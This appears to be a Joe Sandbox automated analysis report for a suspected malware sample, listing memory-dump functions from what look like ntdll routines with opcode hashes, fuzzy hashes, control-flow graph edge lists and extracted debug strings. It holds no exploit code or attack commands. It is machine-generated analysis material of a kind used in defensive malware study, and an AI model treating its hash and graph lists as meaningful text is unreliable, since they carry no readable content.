                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c00cc54e219e11a138d30c9fe9e06738ca903dc2da6ba3b813e008d915f8578f
                                          • Instruction ID: c9a312e46c5cc5ae7f957b71029aa96583e272aeba17a5ee779cc12ece2ee5f8
                                          • Opcode Fuzzy Hash: c00cc54e219e11a138d30c9fe9e06738ca903dc2da6ba3b813e008d915f8578f
                                          • Instruction Fuzzy Hash: B390026131100812D5027559851460A000D87D1345F92C527E1414955EC6358957B132
                                          Function 37732DC0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f4bc42260e72b8b5ef2ec479568aa5b3f9d9f697384fc2a922273fe83bda6c78
                                          • Instruction ID: 8827702313c3230dff1c3209d52d6b59e21697deab1b99ad33ec75a3842eaf57
                                          • Opcode Fuzzy Hash: f4bc42260e72b8b5ef2ec479568aa5b3f9d9f697384fc2a922273fe83bda6c78
                                          • Instruction Fuzzy Hash: E59002B121100812D5407559850474A000947D0301F52C526A5054954FC6698DD97665
                                          Function 37732DA0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf9768e363ffdc79648d3207e0122c444e1f4b1efd80859b54702e31ae9b1664
                                          • Instruction ID: 131d71fbb5a32bb6c02c2e272ee27c34fb56589f26f40e7c99f0340e9025cfa1
                                          • Opcode Fuzzy Hash: cf9768e363ffdc79648d3207e0122c444e1f4b1efd80859b54702e31ae9b1664
                                          • Instruction Fuzzy Hash: 3790026161100912D5017559850461A000E47D0241F92C537A1014955FCA358996B131
                                          Function 37732C50 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1453b3b4f6c29188ba8d3527f674122566546ea8cd158e4eb2f40ec25cf6736c
                                          • Instruction ID: 99cb21c47d4599c5bb7fd9b7291d6768cfd19d628e343d083fec73934685ff29
                                          • Opcode Fuzzy Hash: 1453b3b4f6c29188ba8d3527f674122566546ea8cd158e4eb2f40ec25cf6736c
                                          • Instruction Fuzzy Hash: E690026131100413D5407559951860A400997E1301F52D526E0404954DD925885A7222
                                          Function 37733C30 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da538b445fef672ef0a2783f3434073bdc43073fbec6808239d929b65f95be3a
                                          • Instruction ID: f1df439704996eb19738caf560716bb567ee838ac47cbe9ff40d1394bfc14a3b
                                          • Opcode Fuzzy Hash: da538b445fef672ef0a2783f3434073bdc43073fbec6808239d929b65f95be3a
                                          • Instruction Fuzzy Hash: DA90027121200552994076599904A4E410947E1302B92D92AA0005954DC92488657221
                                          Function 37732C30 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 74f609c7e1f45b2dca90a7f0b415c5ad8a551c6b3aea6db573724e8db03c387d
                                          • Instruction ID: b407803e43460ccbee27cf6c4f7098cd8db09df6c459f5c1c1d31365a801ee1a
                                          • Opcode Fuzzy Hash: 74f609c7e1f45b2dca90a7f0b415c5ad8a551c6b3aea6db573724e8db03c387d
                                          • Instruction Fuzzy Hash: 1890026922300412D5807559950860E000947D1202F92D92AA0005958DC925886D7321
                                          Function 37732C20 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60c8aa70f9e62923944607683e1008ae1e03014fe3d03ab5022c447687b9afad
                                          • Instruction ID: 66fb974efbe3367577ff9ac38e5fc3226e756daf826bd0952129ea4836deb104
                                          • Opcode Fuzzy Hash: 60c8aa70f9e62923944607683e1008ae1e03014fe3d03ab5022c447687b9afad
                                          • Instruction Fuzzy Hash: D890026121504852D50079599508A0A000947D0205F52D526A1054995EC6358855B131
                                          Function 37732C10 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b810847305c10075a9601713bafc947a490bf1c0f61d11f10b2b75741a03899
                                          • Instruction ID: c72fed0f85b252a6ed0788a5ced60a8efc036491b407bfed25822b0951fcda7f
                                          • Opcode Fuzzy Hash: 1b810847305c10075a9601713bafc947a490bf1c0f61d11f10b2b75741a03899
                                          • Instruction Fuzzy Hash: D890027121100813D5007559960870B000947D0201F52D926A0414958ED66688557121
                                          Function 37732CF0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aabc4a895cf68bdb59ce75f999dfd929919ac81b20c9069d35230497346b670f
                                          • Instruction ID: 26e1e30d109e66848f519cef023deeda9fc98a1b44aeee3451ff98f29adc9aa6
                                          • Opcode Fuzzy Hash: aabc4a895cf68bdb59ce75f999dfd929919ac81b20c9069d35230497346b670f
                                          • Instruction Fuzzy Hash: 9C900261252045625945B559850450B400A57E0241792C527A1404D50DC536985AF621
                                          Function 377CA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 765 377ca1f0-377ca269 call 37702330 * 2 RtlDebugPrintTimes 771 377ca41f-377ca444 call 377024d0 * 2 call 37734b50 765->771 772 377ca26f-377ca27a 765->772 774 377ca27c-377ca289 772->774 775 377ca2a4 772->775 777 377ca28f-377ca295 774->777 778 377ca28b-377ca28d 774->778 779 377ca2a8-377ca2b4 775->779 781 377ca29b-377ca2a2 777->781 782 377ca373-377ca375 777->782 778->777 783 377ca2c1-377ca2c3 779->783 781->779 785 377ca39f-377ca3a1 782->785 786 377ca2c5-377ca2c7 783->786 787 377ca2b6-377ca2bc 783->787 788 377ca2d5-377ca2fd RtlDebugPrintTimes 785->788 789 377ca3a7-377ca3b4 785->789 786->785 791 377ca2cc-377ca2d0 787->791 792 377ca2be 787->792 788->771 801 377ca303-377ca320 RtlDebugPrintTimes 788->801 793 377ca3da-377ca3e6 789->793 794 377ca3b6-377ca3c3 789->794 796 377ca3ec-377ca3ee 791->796 792->783 799 377ca3fb-377ca3fd 793->799 797 377ca3cb-377ca3d1 794->797 798 377ca3c5-377ca3c9 794->798 796->785 802 377ca4eb-377ca4ed 797->802 803 377ca3d7 797->803 798->797 804 377ca3ff-377ca401 799->804 805 377ca3f0-377ca3f6 799->805 801->771 813 377ca326-377ca34c RtlDebugPrintTimes 801->813 806 377ca403-377ca409 802->806 803->793 804->806 807 377ca3f8 805->807 808 377ca447-377ca44b 805->808 811 377ca40b-377ca41d RtlDebugPrintTimes 806->811 812 377ca450-377ca474 RtlDebugPrintTimes 806->812 807->799 810 377ca51f-377ca521 808->810 811->771 812->771 817 377ca476-377ca493 RtlDebugPrintTimes 812->817 813->771 818 377ca352-377ca354 813->818 817->771 825 377ca495-377ca4c4 RtlDebugPrintTimes 817->825 819 377ca356-377ca363 818->819 820 377ca377-377ca38a 818->820 822 377ca36b-377ca371 819->822 823 377ca365-377ca369 819->823 824 377ca397-377ca399 820->824 822->782 822->820 823->822 826 377ca38c-377ca392 824->826 827 377ca39b-377ca39d 824->827 825->771 831 377ca4ca-377ca4cc 825->831 829 377ca3e8-377ca3ea 826->829 830 377ca394 826->830 827->785 829->796 830->824 832 377ca4ce-377ca4db 831->832 833 377ca4f2-377ca505 831->833 834 377ca4dd-377ca4e1 832->834 835 377ca4e3-377ca4e9 832->835 836 377ca512-377ca514 833->836 834->835 835->802 835->833 837 377ca516 836->837 838 377ca507-377ca50d 836->838 837->804 839 377ca50f 838->839 840 377ca51b-377ca51d 838->840 839->836 840->810
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP:
                                          • API String ID: 3446177414-2466845122
                                          • Opcode ID: e3fb0d6afad3169de36fbf45136d446790c3af1e33dceaf276ffcc750d7b112a
                                          • Instruction ID: 75d4851a66d93f8b928b4b810ef5c721bdff654666b1c348ee9fd0c6464efcc4
                                          • Opcode Fuzzy Hash: e3fb0d6afad3169de36fbf45136d446790c3af1e33dceaf276ffcc750d7b112a
                                          • Instruction Fuzzy Hash: E0A16B766143128FD704CE28C894A2AB7E6FB8C361F16496DEA45DF321EB30ED45CB91
                                          Function 37727550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 841 37727550-37727571 842 37727573-3772758f call 376fe580 841->842 843 377275ab-377275b9 call 37734b50 841->843 848 37764443 842->848 849 37727595-377275a2 842->849 853 3776444a-37764450 848->853 850 377275a4 849->850 851 377275ba-377275c9 call 37727738 849->851 850->843 857 37727621-3772762a 851->857 858 377275cb-377275e1 call 377276ed 851->858 855 37764456-377644c3 call 3777ef10 call 37738f40 RtlDebugPrintTimes BaseQueryModuleData 853->855 856 377275e7-377275f0 call 37727648 853->856 855->856 873 377644c9-377644d1 855->873 856->857 866 377275f2 856->866 861 377275f8-37727601 857->861 858->853 858->856 868 37727603-37727612 call 3772763b 861->868 869 3772762c-3772762e 861->869 866->861 871 37727614-37727616 868->871 869->871 875 37727630-37727639 871->875 876 37727618-3772761a 871->876 873->856 877 377644d7-377644de 873->877 875->876 876->850 878 3772761c 876->878 877->856 879 377644e4-377644ef 877->879 880 377645c9-377645db call 37732b70 878->880 881 377645c4 call 37734c68 879->881 882 377644f5-3776452e call 3777ef10 call 3773a9c0 879->882 880->850 881->880 890 37764546-37764576 call 3777ef10 882->890 891 37764530-37764541 call 3777ef10 882->891 890->856 896 3776457c-3776458a call 3773a690 890->896 891->857 899 37764591-377645ae call 3777ef10 call 3776cc1e 896->899 900 3776458c-3776458e 896->900 899->856 905 377645b4-377645bd 899->905 900->899 905->896 906 377645bf 905->906 906->856
                                          Strings
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 37764530
                                          • ExecuteOptions, xrefs: 377644AB
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3776454D
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 37764507
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 37764592
                                          • Execute=1, xrefs: 3776451E
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 37764460
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: 9cdeb8244dd65abc5862ca85a5aba82d923523e21659a77354068a2bf2cd3a63
                                          • Instruction ID: b2e4fdc459e51e46b87bade0ec6530ba326f3d3393831622e3fcbb2bd892eea8
                                          • Opcode Fuzzy Hash: 9cdeb8244dd65abc5862ca85a5aba82d923523e21659a77354068a2bf2cd3a63
                                          • Instruction Fuzzy Hash: C1514971A003096FEF109A95DD99FED73B9EF08318F4008EDDA14AF181DB74AA45DEA1
                                          Function 3770A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1388 3770a170-3770a18f 1389 3770a195-3770a1b1 1388->1389 1390 3770a4ad-3770a4b4 1388->1390 1392 377577f3-377577f8 1389->1392 1393 3770a1b7-3770a1c0 1389->1393 1390->1389 1391 3770a4ba-377577c8 1390->1391 1391->1389 1396 377577ce-377577d3 1391->1396 1393->1392 1395 3770a1c6-3770a1cc 1393->1395 1397 3770a1d2-3770a1d4 1395->1397 1398 3770a5da-3770a5dc 1395->1398 1399 3770a393-3770a399 1396->1399 1397->1392 1400 3770a1da-3770a1dd 1397->1400 1398->1400 1401 3770a5e2 1398->1401 1400->1392 1402 3770a1e3-3770a1e6 1400->1402 1401->1402 1403 3770a1e8-3770a1f1 1402->1403 1404 3770a1fa-3770a1fd 1402->1404 1405 3770a1f7 1403->1405 1406 377577d8-377577e2 1403->1406 1407 3770a203-3770a24b 1404->1407 1408 3770a5e7-3770a5f0 1404->1408 1405->1404 1410 377577e7-377577f0 call 3777ef10 1406->1410 1411 3770a250-3770a255 1407->1411 1408->1407 1409 3770a5f6-3775780c 1408->1409 1409->1410 1410->1392 1414 3770a25b-3770a263 1411->1414 1415 3770a39c-3770a39f 1411->1415 1417 3770a26f-3770a27d 1414->1417 1419 3770a265-3770a269 1414->1419 1416 3770a3a5-3770a3a8 1415->1416 1415->1417 1420 37757823-37757826 1416->1420 1421 3770a3ae-3770a3be 1416->1421 1417->1421 1423 3770a283-3770a288 1417->1423 1419->1417 1422 3770a4bf-3770a4c8 1419->1422 1427 3770a28c-3770a28e 1420->1427 1428 3775782c-37757831 1420->1428 1421->1420 1424 3770a3c4-3770a3cd 1421->1424 1425 3770a4e0-3770a4e3 1422->1425 1426 3770a4ca-3770a4cc 1422->1426 1423->1427 1424->1427 1431 3770a4e9-3770a4ec 1425->1431 1432 3775780e 1425->1432 1426->1417 1430 3770a4d2-3770a4db 1426->1430 1433 3770a294-3770a2ac call 3770a600 1427->1433 1434 37757833 1427->1434 1429 37757838 1428->1429 1435 3775783a-3775783c 1429->1435 1430->1427 1436 3770a4f2-3770a4f5 1431->1436 1437 37757819 1431->1437 1432->1437 1441 3770a3d2-3770a3d9 1433->1441 1442 3770a2b2-3770a2da 1433->1442 1434->1429 1435->1399 1439 37757842 1435->1439 1436->1426 1437->1420 1443 3770a2dc-3770a2de 1441->1443 1444 3770a3df-3770a3e2 1441->1444 1442->1443 1443->1435 1445 3770a2e4-3770a2eb 1443->1445 1444->1443 1446 3770a3e8-3770a3f3 1444->1446 1447 3770a2f1-3770a2f4 1445->1447 1448 377578ed 1445->1448 1446->1411 1449 3770a300-3770a30a 1447->1449 1450 377578f1-37757909 call 3777ef10 1448->1450 1449->1450 1451 3770a310-3770a32c call 3770a760 1449->1451 1450->1399 1456 3770a332-3770a337 1451->1456 1457 3770a4f7-3770a500 1451->1457 1456->1399 1458 3770a339-3770a35d 1456->1458 1459 3770a521-3770a523 1457->1459 1460 3770a502-3770a50b 1457->1460 1463 3770a360-3770a363 1458->1463 1461 3770a525-3770a543 call 376f4428 1459->1461 1462 3770a549-3770a551 1459->1462 1460->1459 1464 3770a50d-3770a511 1460->1464 1461->1399 1461->1462 1466 3770a3f8-3770a3fc 1463->1466 1467 3770a369-3770a36c 1463->1467 1468 3770a5a1-3770a5cb RtlDebugPrintTimes 1464->1468 1469 3770a517-3770a51b 1464->1469 1471 37757847-3775784f 1466->1471 1472 3770a402-3770a405 1466->1472 1473 3770a372-3770a374 1467->1473 1474 377578e3 1467->1474 1468->1459 1487 3770a5d1-3770a5d5 1468->1487 1469->1459 1469->1468 1475 37757855-37757859 1471->1475 1476 3770a554-3770a56a 1471->1476 1472->1476 1477 3770a40b-3770a40e 1472->1477 1478 3770a440-3770a459 call 3770a600 1473->1478 1479 3770a37a-3770a381 1473->1479 1474->1448 1475->1476 1481 3775785f-37757868 1475->1481 1482 3770a570-3770a579 1476->1482 1483 3770a414-3770a42c 1476->1483 1477->1467 1477->1483 1497 3770a57e-3770a585 1478->1497 1498 3770a45f-3770a487 1478->1498 1485 3770a387-3770a38c 1479->1485 1486 3770a49b-3770a4a2 1479->1486 1489 37757892-37757894 1481->1489 1490 3775786a-3775786d 1481->1490 1482->1473 1483->1467 1491 3770a432-3770a43b 1483->1491 1485->1399 1493 3770a38e 1485->1493 1486->1449 1488 3770a4a8 1486->1488 1487->1459 1488->1448 1489->1476 1496 3775789a-377578a3 1489->1496 1494 3775786f-37757879 1490->1494 1495 3775787b-3775787e 1490->1495 1491->1473 1493->1399 1501 3775788e 1494->1501 1502 37757880-37757889 1495->1502 1503 3775788b 1495->1503 1496->1473 1499 3770a489-3770a48b 1497->1499 1500 3770a58b-3770a58e 1497->1500 1498->1499 1499->1485 1504 3770a491-3770a493 1499->1504 1500->1499 1505 3770a594-3770a59c 1500->1505 1501->1489 1502->1496 1503->1501 1506 3770a499 1504->1506 1507 377578a8-377578b1 1504->1507 1505->1463 1506->1486 1507->1506 1508 377578b7-377578bd 1507->1508 1508->1506 1509 377578c3-377578cb 1508->1509 1509->1506 1510 377578d1-377578dc 1509->1510 1510->1509 1511 377578de 1510->1511 1511->1506
                                          Strings
                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 377577E2
                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37757807
                                          • SsHd, xrefs: 3770A304
                                          • Actx , xrefs: 37757819, 37757880
                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 377578F3
                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 377577DD, 37757802
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                          • API String ID: 0-1988757188
                                          • Opcode ID: f1eab2d7af1fc8f2345813f148d79a59531b42f4a98c7b0853e529348f9617e1
                                          • Instruction ID: fd50241dbdb4a7e0124929303305e5de2848192315b1682c72ae00527324cc01
                                          • Opcode Fuzzy Hash: f1eab2d7af1fc8f2345813f148d79a59531b42f4a98c7b0853e529348f9617e1
                                          • Instruction Fuzzy Hash: 0BE17E746043028FE715CE28C8D4B6AB7E2BB85364F524A2DE855CF291DB31E949CB92
                                          Function 3770D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1556 3770d690-3770d6cb 1557 3770d6d1-3770d6db 1556->1557 1558 3770d907-3770d90e 1556->1558 1560 37759164 1557->1560 1561 3770d6e1-3770d6ea 1557->1561 1558->1557 1559 3770d914-37759139 1558->1559 1559->1557 1567 3775913f-37759144 1559->1567 1564 3775916e-3775917d 1560->1564 1561->1560 1563 3770d6f0-3770d6f3 1561->1563 1565 3770d6f9-3770d6fb 1563->1565 1566 3770d8fa-3770d8fc 1563->1566 1570 37759158-37759161 call 3777ef10 1564->1570 1565->1560 1568 3770d701-3770d704 1565->1568 1566->1568 1569 3770d902 1566->1569 1571 3770d847-3770d858 call 37734b50 1567->1571 1568->1560 1572 3770d70a-3770d70d 1568->1572 1569->1572 1570->1560 1576 3770d713-3770d716 1572->1576 1577 3770d919-3770d922 1572->1577 1580 3770d71c-3770d768 call 3770d580 1576->1580 1581 3770d92d-3770d936 1576->1581 1577->1576 1579 3770d928-37759153 1577->1579 1579->1570 1580->1571 1586 3770d76e-3770d772 1580->1586 1581->1580 1583 3770d93c 1581->1583 1583->1564 1586->1571 1587 3770d778-3770d77f 1586->1587 1588 3770d8f1-3770d8f5 1587->1588 1589 3770d785-3770d789 1587->1589 1590 37759370-37759388 call 3777ef10 1588->1590 1591 3770d790-3770d79a 1589->1591 1590->1571 1591->1590 1592 3770d7a0-3770d7a7 1591->1592 1594 3770d7a9-3770d7ad 1592->1594 1595 3770d80d-3770d82d 1592->1595 1597 3770d7b3-3770d7b8 1594->1597 1598 3775917f 1594->1598 1599 3770d830-3770d833 1595->1599 1600 37759186-37759188 1597->1600 1601 3770d7be-3770d7c5 1597->1601 1598->1600 1602 3770d835-3770d838 1599->1602 1603 3770d85b-3770d860 1599->1603 1600->1601 1606 3775918e-377591b7 1600->1606 1607 377591f7-377591fa 1601->1607 1608 3770d7cb-3770d803 call 37738170 1601->1608 1609 37759366-3775936b 1602->1609 1610 3770d83e-3770d840 1602->1610 1604 377592e0-377592e8 1603->1604 1605 3770d866-3770d869 1603->1605 1613 3770d941-3770d94f 1604->1613 1614 377592ee-377592f2 1604->1614 1605->1613 1615 3770d86f-3770d872 1605->1615 1606->1595 1616 377591bd-377591d7 call 37748050 1606->1616 1618 377591fe-3775920d call 37748050 1607->1618 1631 3770d805-3770d807 1608->1631 1609->1571 1611 3770d891-3770d8ac call 3770a600 1610->1611 1612 3770d842 1610->1612 1638 37759335-3775933a 1611->1638 1639 3770d8b2-3770d8da 1611->1639 1612->1571 1620 3770d874-3770d884 1613->1620 1622 3770d955-3770d95e 1613->1622 1614->1613 1619 377592f8-37759301 1614->1619 1615->1602 1615->1620 1616->1631 1637 377591dd-377591f0 1616->1637 1633 37759224 1618->1633 1634 3775920f-3775921d 1618->1634 1626 37759303-37759306 1619->1626 1627 3775931f-37759321 1619->1627 1620->1602 1628 3770d886-3770d88f 1620->1628 1622->1610 1635 37759310-37759313 1626->1635 1636 37759308-3775930e 1626->1636 1627->1613 1641 37759327-37759330 1627->1641 1628->1610 1631->1595 1640 3775922d-37759231 1631->1640 1633->1640 1634->1618 1644 3775921f 1634->1644 1646 37759315-3775931a 1635->1646 1647 3775931c 1635->1647 1636->1627 1637->1616 1648 377591f2 1637->1648 1642 37759340-37759343 1638->1642 1643 3770d8dc-3770d8de 1638->1643 1639->1643 1640->1595 1645 37759237-3775923d 1640->1645 1641->1610 1642->1643 1649 37759349-37759351 1642->1649 1652 37759356-3775935b 1643->1652 1653 3770d8e4-3770d8eb 1643->1653 1644->1595 1650 37759264-3775926d 1645->1650 1651 3775923f-3775925c 1645->1651 1646->1641 1647->1627 1648->1595 1649->1599 1656 377592b4-377592b6 1650->1656 1657 3775926f-37759274 1650->1657 1651->1650 1655 3775925e-37759261 1651->1655 1652->1571 1654 37759361 1652->1654 1653->1588 1653->1591 1654->1609 1655->1650 1658 377592d9-377592db 1656->1658 1659 377592b8-377592d3 call 376f4428 1656->1659 1657->1656 1660 37759276-3775927a 1657->1660 1658->1571 1659->1571 1659->1658 1662 37759282-377592ae RtlDebugPrintTimes 1660->1662 1663 3775927c-37759280 1660->1663 1662->1656 1666 377592b0 1662->1666 1663->1656 1663->1662 1666->1656
                                          APIs
                                          Strings
                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37759153
                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37759178
                                          • Actx , xrefs: 37759315
                                          • GsHd, xrefs: 3770D794
                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 37759372
                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 3775914E, 37759173
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                          • API String ID: 3446177414-2196497285
                                          • Opcode ID: 6eca472afc436e3e7e49f3fdd6941b7dffe4d424cd3824fdb87811111e2e229b
                                          • Instruction ID: d54469ba2e84d23a2be21bdbf806049a3177b174859cfa19a7eef6abae61cc98
